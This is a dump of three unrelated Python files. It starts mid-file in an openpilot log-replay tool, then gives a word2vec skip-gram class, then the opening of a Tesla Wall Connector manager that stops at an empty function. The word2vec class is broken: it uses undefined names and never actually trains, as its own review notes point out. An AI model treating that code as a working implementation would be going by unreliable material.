                    data_socket.send(bts, copy=False)
            data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE)
            data_socket.send(smsg.to_bytes(), copy=False)

    def _process_commands(self, cmd, route, pub_types):
        """Apply one control command; returns the (possibly new) active route."""
        seek_to = None
        if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name):
            seek_to = cmd.start_time
            route = Route(cmd.name, cmd.data_dir)
            self._lr = MultiLogIterator(route.log_paths(), wraparound=True)
            if self._frame_reader is not None:
                self._frame_reader.close()
            if "roadCameraState" in pub_types or "roadEncodeIdx" in pub_types:
                # reset frames for a route
                self._frame_id_lookup = {}
                self._frame_reader = RouteFrameReader(
                    route.camera_paths(), None, self._frame_id_lookup, readahead=True)
        # always reset this on a seek
        if isinstance(cmd, SeekRelativeTime):
            seek_to = self._lr.tell() + cmd.secs
        elif isinstance(cmd, SeekAbsoluteTime):
            seek_to = cmd.secs
        elif isinstance(cmd, StopAndQuit):
            exit()
        if seek_to is not None:
            print("seeking", seek_to)
            if not self._lr.seek(seek_to):
                print("Can't seek: time out of bounds")
            else:
                next(self._lr)  # ignore one
        return route
def _get_address_send_func(address):
    """Create a pub socket bound to `address` and return its send method."""
    return pub_sock(address).send
def _get_vipc_server(length):
    """Build a VisionIpc server sized for a raw RGB buffer of `length` bytes."""
    # Recover (width, height) from the flat 3-byte-per-pixel buffer length.
    size_by_length = {3 * w * h: (w, h) for (w, h) in [tici_f_frame_size, eon_f_frame_size]}
    w, h = size_by_length[length]
    server = VisionIpcServer("camerad")
    server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, w, h)
    server.start_listener()
    return server
def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime,
                    address_mapping, publish_time_length, bind_early, no_loop, no_visionipc):
    """Control loop: receives logged messages from the worker and publishes
    them on their real sockets, pacing playback to real time if requested."""
    # Fresh zmq context: this runs in a forked multiprocessing child.
    zmq.Context._instance = None
    context = zmq.Context.instance()
    command_sock = context.socket(zmq.PULL)
    command_sock.bind(command_address)
    forward_commands_socket = context.socket(zmq.PUSH)
    forward_commands_socket.bind(forward_commands_address)
    data_socket = context.socket(zmq.PULL)
    data_socket.bind(data_address)
    # Set readahead to a reasonable number.
    data_socket.setsockopt(zmq.RCVHWM, 10000)
    poller = zmq.Poller()
    poller.register(command_sock, zmq.POLLIN)
    poller.register(data_socket, zmq.POLLIN)
    if bind_early:
        send_funcs = {
            typ: _get_address_send_func(address)
            for typ, address in address_mapping.items()
        }
        # Give subscribers a chance to connect.
        time.sleep(0.1)
    else:
        # Sockets are bound lazily the first time each type is seen.
        send_funcs = {}
    start_time = float("inf")
    printed_at = 0
    # `generation` tags commands so stale in-flight data can be skipped.
    generation = 0
    paused = False
    reset_time = True
    prev_msg_time = None
    vipc_server = None
    while True:
        evts = dict(poller.poll())
        if command_sock in evts:
            cmd = command_sock.recv_pyobj()
            if isinstance(cmd, TogglePause):
                # Pause by simply ignoring the data socket.
                paused = not paused
                if paused:
                    poller.modify(data_socket, 0)
                else:
                    poller.modify(data_socket, zmq.POLLIN)
            else:
                # Forward the command to the log data thread.
                # TODO: Remove everything on data_socket.
                generation += 1
                forward_commands_socket.send_pyobj((generation, cmd))
                if isinstance(cmd, StopAndQuit):
                    return
                reset_time = True
        elif data_socket in evts:
            msg_generation, typ, msg_time, route_time, *extra = data_socket.recv_pyobj(flags=zmq.RCVMORE)
            msg_bytes = data_socket.recv()
            if msg_generation < generation:
                # Skip packets.
                continue
            # A backwards jump of more than 1 s of log time means the route
            # wrapped around; with --no-loop that ends the replay.
            if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9:
                generation += 1
                forward_commands_socket.send_pyobj((generation, StopAndQuit()))
                return
            prev_msg_time = msg_time
            msg_time_seconds = msg_time * 1e-9
            if reset_time:
                msg_start_time = msg_time_seconds
                real_start_time = realtime.sec_since_boot()
                start_time = min(start_time, msg_start_time)
                reset_time = False
            if publish_time_length and msg_time_seconds - start_time > publish_time_length:
                generation += 1
                forward_commands_socket.send_pyobj((generation, StopAndQuit()))
                return
            # Print time.
            if abs(printed_at - route_time) > 5.:
                print("at", route_time)
                printed_at = route_time
            if typ not in send_funcs and typ != 'vipc':
                if typ in address_mapping:
                    # Remove so we don't keep printing warnings.
                    address = address_mapping.pop(typ)
                    try:
                        print("binding", typ)
                        send_funcs[typ] = _get_address_send_func(address)
                    except Exception as e:
                        print("couldn't replay {}: {}".format(typ, e))
                        continue
                else:
                    # Skip messages that we are not registered to publish.
                    continue
            # Sleep as needed for real time playback.
            if run_realtime:
                msg_time_offset = msg_time_seconds - msg_start_time
                real_time_offset = realtime.sec_since_boot() - real_start_time
                lag = msg_time_offset - real_time_offset
                if lag > 0 and lag < 30:  # a large jump is OK, likely due to an out of order segment
                    if lag > 1:
                        print("sleeping for", lag)
                    time.sleep(lag)
                elif lag < -1:
                    # Relax the real time schedule when we slip far behind.
                    reset_time = True
            # Send message.
            try:
                if typ == VIPC_TYP and (not no_visionipc):
                    # Lazily size the vision server from the first frame.
                    if vipc_server is None:
                        vipc_server = _get_vipc_server(len(msg_bytes))
                    i, sof, eof = extra[0]
                    vipc_server.send(VisionStreamType.VISION_STREAM_RGB_BACK, msg_bytes, i, sof, eof)
                if typ != VIPC_TYP:
                    send_funcs[typ](msg_bytes)
            except MultiplePublishersError:
                # Someone else owns this socket now; stop publishing it.
                del send_funcs[typ]
def timestamp_to_s(tss):
    """Parse a 'YYYY-MM-DD--HH-MM-SS' route timestamp into local epoch seconds."""
    parsed = datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S')
    return time.mktime(parsed.timetuple())
def absolute_time_str(s, start_time):
    """Interpret `s` as either a plain number of seconds or a route
    timestamp string, returning seconds relative to `start_time`."""
    try:
        # first try if it's a float
        return float(s)
    except ValueError:
        # now see if it's a timestamp
        return timestamp_to_s(s) - start_time
def _get_address_mapping(args):
    """Build the {service_name: zmq address} map of services to mock."""
    if args.min is not None:
        # Minimal service set needed for a basic replay.
        services_to_mock = [
            'deviceState', 'can', 'pandaState', 'sensorEvents', 'gpsNMEA', 'roadCameraState', 'roadEncodeIdx',
            'modelV2', 'liveLocation',
        ]
    elif args.enabled is not None:
        services_to_mock = args.enabled
    else:
        services_to_mock = service_list.keys()
    # Default every service to its own name; explicit pairs override.
    address_mapping = {service_name: service_name for service_name in services_to_mock}
    address_mapping.update(dict(args.address_mapping))
    for k in args.disabled:
        address_mapping.pop(k, None)
    # Warn about names that are not known services (likely typos).
    non_services = set(address_mapping) - set(service_list)
    if non_services:
        print("WARNING: Unknown services {}".format(list(non_services)))
    return address_mapping
def keyboard_controller_thread(q, route_start_time):
    """Read single keypresses and translate them into seek/pause commands
    sent over `q` (a zmq PUSH socket)."""
    print("keyboard waiting for input")
    kb = KBHit()
    while 1:
        c = kb.getch()
        if c == 'm':  # Move forward by 1 minute
            q.send_pyobj(SeekRelativeTime(60))
        elif c == 'M':  # Move backward by 1 minute
            q.send_pyobj(SeekRelativeTime(-60))
        elif c == 's':  # Move forward by 10s
            q.send_pyobj(SeekRelativeTime(10))
        elif c == 'S':  # Move backward by 10s
            q.send_pyobj(SeekRelativeTime(-10))
        elif c == 'G':  # Jump back to the very start of the route
            q.send_pyobj(SeekAbsoluteTime(0.))
        elif c == "\x20":  # Space bar.
            q.send_pyobj(TogglePause())
        elif c == "\n":
            try:
                seek_time_input = input('time: ')
                seek_time = absolute_time_str(seek_time_input, route_start_time)
                # If less than 60, assume segment number
                if seek_time < 60:
                    seek_time *= 60
                q.send_pyobj(SeekAbsoluteTime(seek_time))
            except Exception as e:
                print("Time not understood: {}".format(e))
def get_arg_parser():
    """Build the command-line parser for the unlogger."""
    parser = argparse.ArgumentParser(
        description="Mock openpilot components by publishing logged messages.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?",
                        help="The route whose messages will be published.")
    parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'),
                        help="Path to directory in which log and camera files are located.")
    parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.")
    def key_value_pair(x):
        # "service=addr" -> [service, addr]
        return x.split("=")
    parser.add_argument("address_mapping", nargs="*", type=key_value_pair,
                        help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.")
    def comma_list(x):
        return x.split(",")
    # --min and --enabled are mutually exclusive ways to pick services.
    to_mock_group = parser.add_mutually_exclusive_group()
    to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN"))
    to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=comma_list)
    parser.add_argument("--disabled", type=comma_list, default=os.getenv("DISABLED") or ())
    parser.add_argument(
        "--tl", dest="publish_time_length", type=float, default=None,
        help="Length of interval in event time for which messages should be published.")
    parser.add_argument(
        "--no-realtime", dest="realtime", action="store_false", default=True,
        help="Publish messages as quickly as possible instead of realtime.")
    parser.add_argument(
        "--no-interactive", dest="interactive", action="store_false", default=True,
        help="Disable interactivity.")
    parser.add_argument(
        "--bind-early", action="store_true", default=False,
        help="Bind early to avoid dropping messages.")
    parser.add_argument(
        "--no-visionipc", action="store_true", default=False,
        help="Do not output video over visionipc")
    parser.add_argument(
        "--start-time", type=float, default=0.,
        help="Seek to this absolute time (in seconds) upon starting playback.")
    return parser
def main(argv):
    """Wire up the worker and control processes and run until exit."""
    # NOTE(review): the argv parameter is ignored; sys.argv[1:] is parsed
    # instead (equivalent for the __main__ call below, but surprising).
    args = get_arg_parser().parse_args(sys.argv[1:])
    # Unique ipc endpoints for this run.
    command_address = "ipc:///tmp/{}".format(uuid4())
    forward_commands_address = "ipc:///tmp/{}".format(uuid4())
    data_address = "ipc:///tmp/{}".format(uuid4())
    address_mapping = _get_address_mapping(args)
    command_sock = zmq.Context.instance().socket(zmq.PUSH)
    command_sock.connect(command_address)
    if args.route_name is not None:
        route_name_split = args.route_name.split("|")
        if len(route_name_split) > 1:
            # Route names embed their start timestamp after the '|'.
            route_start_time = timestamp_to_s(route_name_split[1])
        else:
            route_start_time = 0
        command_sock.send_pyobj(
            SetRoute(args.route_name, args.start_time, args.data_dir))
    else:
        print("waiting for external command...")
        route_start_time = 0
    subprocesses = {}
    try:
        subprocesses["data"] = multiprocessing.Process(
            target=UnloggerWorker().run,
            args=(forward_commands_address, data_address, address_mapping.copy()))
        subprocesses["control"] = multiprocessing.Process(
            target=unlogger_thread,
            args=(command_address, forward_commands_address, data_address, args.realtime,
                  _get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop, args.no_visionipc))
        subprocesses["data"].start()
        subprocesses["control"].start()
        # Exit if any of the children die.
        def exit_if_children_dead(*_):
            for _, p in subprocesses.items():
                if not p.is_alive():
                    [p.terminate() for p in subprocesses.values()]
                    exit()
        signal.signal(signal.SIGCHLD, signal.SIG_IGN)
        signal.signal(signal.SIGCHLD, exit_if_children_dead)
        if args.interactive:
            keyboard_controller_thread(command_sock, route_start_time)
        else:
            # Wait forever for children.
            while True:
                time.sleep(10000.)
    finally:
        # Best-effort shutdown: give each child 3 s, then terminate it.
        for p in subprocesses.values():
            if p.is_alive():
                try:
                    p.join(3.)
                except multiprocessing.TimeoutError:
                    p.terminate()
            continue
    return 0

if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
|
word2vec.py | import collections
import math
import multiprocessing
import os
import random
import threading
from copy import deepcopy
import pandas as pd
import numpy as np
import tensorflow as tf
from docluster.core import Model
from docluster.core.document_embedding import TfIdf
from docluster.core.preprocessing import Preprocessor, TokenFilter
from docluster.utils.constants import DistanceMetric, FileType
from docluster.utils.data_fetcher import FileFetcher
from docluster.utils.data_saver import FileSaver
from scipy.special import expit
from .word_embeddings import WordEmbeddings
class Word2Vec(Model):
    """A Skip-Gram Word2Vec model with multi-thread training capability."""

    def __init__(self, preprocessor=None, n_skips=16, n_negative_samples=100, n_words=10000, embedding_size=100, batch_size=32, window_size=10, learning_rate=0.025, n_epochs=1, n_workers=4, do_plot=False):
        """
        A Skip-Gram model Word2Vec with multi-thread training capability.

        Parameters:
        -----------
        preprocessor : Preprocessor
            The preprocessor that will tokenize the documents. The default one
            also filters punctuation, tokens with numeric characters and one
            letter words. Furthermore, no stemming or lemmatization is
            applied. All these can be adjusted by passing a custom
            preprocessor.
        n_skips : int
            The number of skips.
        n_negative_samples : int
            The number of negative samples that are going to be collected for
            each batch.
        n_words : int
            The number of words that the vocabulary will have. The filtering
            is based on the word frequency, so less frequent words will not be
            included in the vocabulary.
        embedding_size : int
            The size of the embedding vectors. Increasing the size
            dramatically affects training time.
        batch_size : int
            The batch size.
        window_size : int
            The window size where the words to the left and to the right of
            the word give context to the word.
        learning_rate : float
            The initial learning rate of the gradient descent.
        n_epochs : int
            The number of epochs the model is going to be trained. Increasing
            the number dramatically affects training time.
        n_workers : int
            The number of workers that are going to train the model
            concurrently. It is not recommended to use more than the number
            of cores.
        do_plot : bool
            Plotting flag (not stored/used in this implementation).

        Attributes:
        -----------
        embeddings :
            The embedding vectors that represent each word.
        """
        if preprocessor is None:
            # Default tokenizer keeps stop words but drops one-letter tokens;
            # no stemming/lemmatization so surface forms are preserved.
            additional_filters = [lambda token: len(token) == 1]
            token_filter = TokenFilter(filter_stop_words=False,
                                       additional_filters=additional_filters)
            preprocessor = Preprocessor(do_stem=False, do_lemmatize=False,
                                        parse_html=False, token_filter=token_filter, lower=False)
        self.preprocessor = preprocessor
        self.n_skips = n_skips
        self.n_negative_samples = n_negative_samples
        self.embedding_size = embedding_size
        self.batch_size = batch_size
        self.window_size = window_size
        self.learning_rate = learning_rate
        self.n_epochs = n_epochs
        self.n_words = n_words
        self.n_workers = n_workers
        self._total_loss = 0
        self._dist_metric = DistanceMetric.cosine
        self.embeddings = WordEmbeddings(size=embedding_size, n_words=n_words)
        # Per-word lock factors plus the two hidden->output weight matrices
        # (syn1 / syn1neg), mirroring gensim's naming convention.
        self.locks = np.ones(n_words)
        self.syn1 = np.zeros((n_words, embedding_size))
        self.syn1neg = np.zeros((n_words, embedding_size))

    def fit(self, documents):
        """
        Train the Word2Vec model with the documents.

        Parameters:
        -----------
        documents : list(str)
            The documents that the Word2Vec model is going to learn the
            embeddings from.
        """
        n_words_trained = 0
        tokens, self.vocab, data, self._frequencies, self.diction, self.reverse_diction = self._build_dataset(
            documents)
        n_tokens = len(tokens)
        n_vocab = len(self.vocab)
        words_per_epoch = n_vocab / self.n_epochs
        self._cum_dist = self._build_cum_dist()
        # NOTE(review): this only prepares the dataset and the cumulative
        # distribution; no call to _train/_train_one_epoch happens here —
        # confirm whether the actual training step was meant to be invoked.

    def _build_dataset(self, documents):
        """Preprocesses the documents and creates the dataset for fitting."""
        # Get the term frequencies without idf
        tfidf = TfIdf(do_idf=False, preprocessor=self.preprocessor, n_words=self.n_words)
        tfidf.fit(documents)
        # Flatten the document tokens to create one long list
        tokens = list(np.hstack(np.array(tfidf.document_tokens)))
        # Create the vocab list with 'UNK' for vocab that couldn't make the vocab list
        vocab = tfidf.vocab
        vocab_set = set(vocab)
        diction = {token: index for index, token in enumerate(vocab)}
        reverse_diction = dict(zip(diction.values(), diction.keys()))
        # Turn the long token list into a index references to the diction
        data = list(map(lambda token: diction[token]
                        if token in vocab_set else 0, tokens))
        # Get the frequencies of tokens and add the frequency of 'UNK' at the beginning
        # frequencies = np.insert(tfidf.total_term_freq, 0, data.count(0))[:self.n_words]
        frequencies = tfidf.total_term_freq[:self.n_words]
        return tokens, vocab, data, frequencies, diction, reverse_diction

    def _build_cum_dist(self, distortion=0.75, domain=2**31 - 1):
        """Cumulative (distorted) frequency table used for negative sampling."""
        freq_total = np.sum(self._frequencies ** distortion)
        # NOTE(review): the cumsum is over the raw frequencies while the
        # normaliser uses the distorted ones — confirm whether the cumsum
        # should also be over self._frequencies ** distortion.
        cum_dist = np.cumsum(self._frequencies) * domain / freq_total
        return cum_dist

    def _train(self, data, optimizer, loss):
        """Train the model."""
        start_index = 0
        init_op = tf.global_variables_initializer()
        with tf.Session() as sess:
            self._sess = sess
            self._sess.run(init_op)
            for epoch in range(self.n_epochs):
                self._train_one_epoch(data, optimizer, loss)
                print("Epoch:", (epoch + 1))
            # NOTE(review): self._embeddings is never assigned in this class;
            # this line will raise AttributeError — verify the intended tensor.
            self.embeddings = self._embeddings.eval()
        print("\nTraining complete!")

    def _train_one_example(self, example, label, alpha):
        """Apply one skip-gram update (appears adapted from gensim's
        train_sg_pair).

        NOTE(review): this method references names that are not defined in
        this scope (model, word, l1, neu1e, learn_hidden, learn_vectors,
        compute_loss, outer, log, dot) — as written it raises NameError when
        called; it looks like a partial port that still needs wiring up.
        """
        predict_word = model.wv.vocab[word]  # target word (NN output)
        # input word (NN input/projection layer)
        example_index = self._diction[example]
        embedding = self.embeddings.vectors[example_index]
        lock = self.locks[example_index]
        # work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
        # 2d matrix, codelen x layer1_size
        l2a = deepcopy(self.syn1[predict_word.point])
        prod_term = np.dot(embedding, l2a.T)
        fa = expit(prod_term)  # propagate hidden -> output
        # vector of error gradients multiplied by the learning rate
        ga = (1 - predict_word.code - fa) * alpha
        if learn_hidden:
            model.syn1[predict_word.point] += outer(ga, l1)  # learn hidden -> output
        sgn = (-1.0)**predict_word.code  # `ch` function, 0 -> 1, 1 -> -1
        lprob = -log(expit(-sgn * prod_term))
        self._total_loss += sum(lprob)
        if model.negative:
            # use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
            word_indices = [predict_word.index]
            while len(word_indices) < model.negative + 1:
                w = model.cum_table.searchsorted(
                    model.random.randint(model.cum_table[-1]))
                if w != predict_word.index:
                    word_indices.append(w)
            l2b = model.syn1neg[word_indices]  # 2d matrix, k+1 x layer1_size
            prod_term = dot(l1, l2b.T)
            fb = expit(prod_term)  # propagate hidden -> output
            # vector of error gradients multiplied by the learning rate
            gb = (model.neg_labels - fb) * alpha
            if learn_hidden:
                model.syn1neg[word_indices] += outer(gb, l1)  # learn hidden -> output
            # loss component corresponding to negative sampling
            if compute_loss:
                # for the sampled words
                self._total_loss -= sum(log(expit(-1 * prod_term[1:])))
                # for the output word
                self._total_loss -= log(expit(prod_term[0]))
        if learn_vectors:
            # learn input -> hidden (mutates model.wv.syn0[word2.index], if that is l1)
            embedding += neu1e * lock_factor

    def _train_one_epoch(self, data, optimizer, loss):
        """Train one epoch with workers."""
        # Each worker generates a batch and trains it until poison pill
        def worker_duty():
            """The duty of a single worker."""
            while True:
                batch = queue.get()
                if batch is None:
                    # Poison pill: no more batches are coming.
                    break
                examples, labels, alphas = batch
                for example, label, alpha in batch:
                    self._train_one_example(example, label, alpha)

        def generate_batch():
            """Create a batch for a training step in Word2Vec."""
            # Initialize variables
            example = np.zeros(self.batch_size)
            labels = np.zeros((self.batch_size, 1))
            alphas = np.zeros(self.batch_size)
            n_items = 0
            index = 0
            while index < len(data):
                # Shrink the context window randomly (standard word2vec trick).
                reduced_window = random.randint(0, self.window_size)
                if data[index] is not None:
                    left = max(0, index - self.window_size + reduced_window)
                    right = min((index + self.window_size + 1 -
                                 reduced_window), len(data) - 1)
                    for pos2 in range(left, right, 1):
                        if n_items == self.batch_size:
                            # NOTE(review): pushes `index` where the consumer
                            # unpacks `alphas`; confirm the intended tuple is
                            # (example, labels, alphas).
                            queue.put((example, labels, index))
                            example = np.zeros(self.batch_size)
                            labels = np.zeros((self.batch_size, 1))
                            n_items = 0
                        if pos2 != index and data[pos2] is not None:
                            example[n_items] = data[pos2]
                            labels[n_items] = data[index]
                            # Linearly decay the learning rate, floored at 0.001.
                            alpha = self.learning_rate - \
                                (self.learning_rate - 0.001) * (index / self.n_words)
                            alphas[n_items] = max(0.001, alpha)
                            n_items += 1
                index += 1
            # Poison pills
            # NOTE(review): `n_workers` is unbound here — presumably
            # self.n_workers was intended; as written this raises NameError.
            for _ in range(n_workers):
                queue.put(None)

        # Create a threadsafe queue to store the batch indexes
        queue = multiprocessing.Queue(maxsize=2 * self.n_workers)
        # Create and run the threads
        workers = [threading.Thread(target=generate_batch)]
        workers.extend([threading.Thread(target=worker_duty)
                        for _ in range(self.n_workers - 1)])
        for worker in workers:
            worker.start()
        for thread in workers:
            thread.join()

    def most_similar_words(self, word, n_words=5, include_similarity=False):
        """
        Get the most similar words to a word.

        Parameters:
        -----------
        word : str
            The word that is the point of interest.
        n_words : int
            The number of words that is going to be returned.
        include_similarity : bool
            If to include the similarity score as part of a tuple next to
            the words.

        Return:
        -------
        similar_words : list(str) or list(tuple(str, float))
            The words that are most similar to the word according to the
            trained embeddings.

        NOTE(review): as written neither `n_words` nor `include_similarity`
        is applied — the full ranking of words is returned; confirm the
        intended truncation/score behaviour.
        """
        if word in self.vocab:
            token_id = self.diction[word]
            tiled_embedding = np.tile(self.embeddings[token_id], (self.n_words, 1))
            embedding_similarities = self._dist_metric(tiled_embedding, self.embeddings)
            most_similar_token_ids = (-embedding_similarities).argsort()
            return list(map(lambda token_id: self.reverse_diction[token_id], most_similar_token_ids))
        else:
            print('not in vocab')

    def save_model(self, model_name, file_type=FileType.csv, safe=True, directory_path=None):
        """
        Save the fitted model.

        Parameters:
        -----------
        model_name : str
            The model name (also the file name) the model is saved under.
        file_type : FileType
            The file type that the model is going to be saved as.

        Return:
        -------
        saved : bool
            If the model is saved successfully or not.
        """
        if self.embeddings is None:
            return False
        # Store embeddings column-per-word so the header carries the vocab.
        data = pd.DataFrame(self.embeddings.T)
        data.columns = self.vocab
        if directory_path:
            file_saver = FileSaver(directory_path=directory_path)
        else:
            file_saver = FileSaver()
        return file_saver.save(data, model_name, file_type=file_type, safe=safe)

    def load_model(self, model_name, file_type=FileType.csv, directory_path=None):
        """Load a previously saved model's embeddings and vocabulary."""
        if directory_path:
            file_fetcher = FileFetcher(directory_path=directory_path)
        else:
            file_fetcher = FileFetcher()
        # NOTE(review): n_words is bumped by one here (presumably for 'UNK');
        # confirm this matches how save_model wrote the file.
        self.n_words += 1
        data = file_fetcher.load(model_name, file_type)
        self.embeddings = data.as_matrix().T
        self.vocab = data.columns.tolist()
        self.diction = {token: index for index, token in enumerate(self.vocab)}
        self.reverse_diction = dict(zip(self.diction.values(), self.diction.keys()))
|
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import commentjson
import importlib
import json
import logging
import os.path
import math
import re
import sys
import time
import traceback
from datetime import datetime
import threading
from ww import f
from TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
# Register custom verbosity levels between INFO (20) and DEBUG (10) so the
# legacy debugLevel 0-11 scale maps onto the logging module.
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO3")  # was mislabelled "INFO4", duplicating level 17
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
# Convenience constants mirroring the level names registered above.
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("\u26FD Manager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
# A module is skipped when its config section sets "enabled" to a falsy value
# (see the instantiation loop below).
modules_available = [
    "Logging.ConsoleLogging",
    "Logging.FileLogging",
    "Logging.SentryLogging",
    "Logging.CSVLogging",
    "Logging.MySQLLogging",
    "Logging.SQLiteLogging",
    "Protocol.TWCProtocol",
    "Interface.Dummy",
    "Interface.RS485",
    "Interface.TCP",
    "Policy.Policy",
    "Vehicle.TeslaAPI",
    "Vehicle.TeslaMateVehicle",
    "Control.WebIPCControl",
    "Control.HTTPControl",
    "Control.MQTTControl",
    # "Control.OCPPControl",
    "EMS.Efergy",
    "EMS.Enphase",
    "EMS.Fronius",
    "EMS.Growatt",
    "EMS.HASS",
    "EMS.IotaWatt",
    "EMS.Kostal",
    "EMS.OpenHab",
    "EMS.OpenWeatherMap",
    "EMS.P1Monitor",
    "EMS.SmartMe",
    "EMS.SmartPi",
    "EMS.SolarEdge",
    "EMS.SolarLog",
    "EMS.TeslaPowerwall2",
    "EMS.TED",
    "EMS.Volkszahler",
    "EMS.URL",
    "Status.HASSStatus",
    "Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
# When DEBUG_SECRET is set in the environment, start a ptvsd remote-debug
# server authenticated with that secret and block start-up until the IDE
# attaches.
if "DEBUG_SECRET" in os.environ:
    import ptvsd

    ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
    ptvsd.wait_for_attach()
##########################
# Load Configuration File
# Prefer the system-wide config; fall back to one in the working directory.
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
    jsonconfig = open("/etc/twcmanager/config.json")
else:
    if os.path.isfile("config.json"):
        jsonconfig = open("config.json")

if jsonconfig:
    # Close the handle once parsed (the original left the file open).
    with jsonconfig:
        config = commentjson.load(jsonconfig)
else:
    logger.error("Unable to find a configuration file.")
    sys.exit()
# Resolve the logging level: an explicit "logLevel" wins; otherwise map the
# legacy numeric "debugLevel" (0-11, higher = more verbose) onto the logging
# levels registered above.
logLevel = config["config"].get("logLevel")
if logLevel is None:
    debugLevel = config["config"].get("debugLevel", 1)
    # debugLevel -> logging level; more verbose debug means a lower threshold.
    debug_to_log = {
        0: 40,
        1: 20,
        2: 19,
        3: 18,
        4: 17,
        5: 16,
        6: 15,
        7: 14,
        8: 13,
        9: 12,
        10: 10,
        11: 9,
    }
    # Pick the first mapping at or above the configured debugLevel.
    for debug, log in debug_to_log.items():
        if debug >= debugLevel:
            logLevel = log
            break

logging.getLogger().setLevel(logLevel)
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 65535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(data):
    """Return *data* as space-separated uppercase two-digit hex values.

    Accepts either a str (each character's ordinal is shown) or a
    bytes/bytearray (each byte value is shown). The original file defined
    hex_str twice; the second definition shadowed the str variant, so calls
    with a str argument would have crashed in "{:02X}".format.
    """
    if isinstance(data, str):
        return " ".join("{:02X}".format(ord(c)) for c in data)
    return " ".join("{:02X}".format(c) for c in data)
def time_now():
    """Return the current wall-clock time formatted for log output."""
    global config
    fmt = "%H:%M:%S"
    if config["config"]["displayMilliseconds"]:
        # %f actually appends microseconds, despite the config key's name.
        fmt += ".%f"
    return datetime.now().strftime(fmt)
def unescape_msg(inmsg: bytearray, msgLen):
    """Unescape an RS485 message and strip its framing bytes.

    Given a message received on the RS485 network, remove leading and trailing
    C0 byte and unescape special byte values (db dc -> c0, db dd -> db).
    Returns the unescaped payload as a bytearray.
    """
    # Note that a bytearray is mutable, whereas a bytes object isn't.
    # By initializing a bytearray and concatenating the incoming bytearray
    # to it, we protect against being passed an immutable bytes object
    msg = bytearray() + inmsg[0:msgLen]

    # See notes in RS485.send() for the way certain bytes in messages are escaped.
    # We basically want to change db dc into c0 and db dd into db.
    # Only scan to one less than the length of the string to avoid running off
    # the end looking at i+1. (The original loop scanned the final byte too,
    # so a message ending in 0xDB raised IndexError on msg[i + 1].)
    i = 0
    while i < len(msg) - 1:
        if msg[i] == 0xDB:
            if msg[i + 1] == 0xDC:
                # Replace characters at msg[i] and msg[i+1] with 0xc0,
                # shortening the string by one character. In Python, msg[x:y]
                # refers to a substring starting at x and ending immediately
                # before y. y - x is the length of the substring.
                msg[i : i + 2] = [0xC0]
            elif msg[i + 1] == 0xDD:
                msg[i : i + 2] = [0xDB]
            else:
                logger.info(
                    "ERROR: Special character 0xDB in message is "
                    "followed by invalid character 0x%02X. "
                    "Message may be corrupted." % (msg[i + 1])
                )
                # Replace the character with something even though it's probably
                # not the right thing.
                msg[i : i + 2] = [0xDB]
        i = i + 1

    # Remove leading and trailing C0 byte.
    msg = msg[1 : len(msg) - 1]
    return msg
def background_tasks_thread(master):
    """Worker loop that executes queued background tasks.

    Runs forever in a daemon thread, pulling task dicts from the master's
    background queue and dispatching on task["cmd"]. Tasks are jobs that
    would block the main RS485 loop for too long (Tesla API calls,
    webhooks, settings saves, ...).
    """
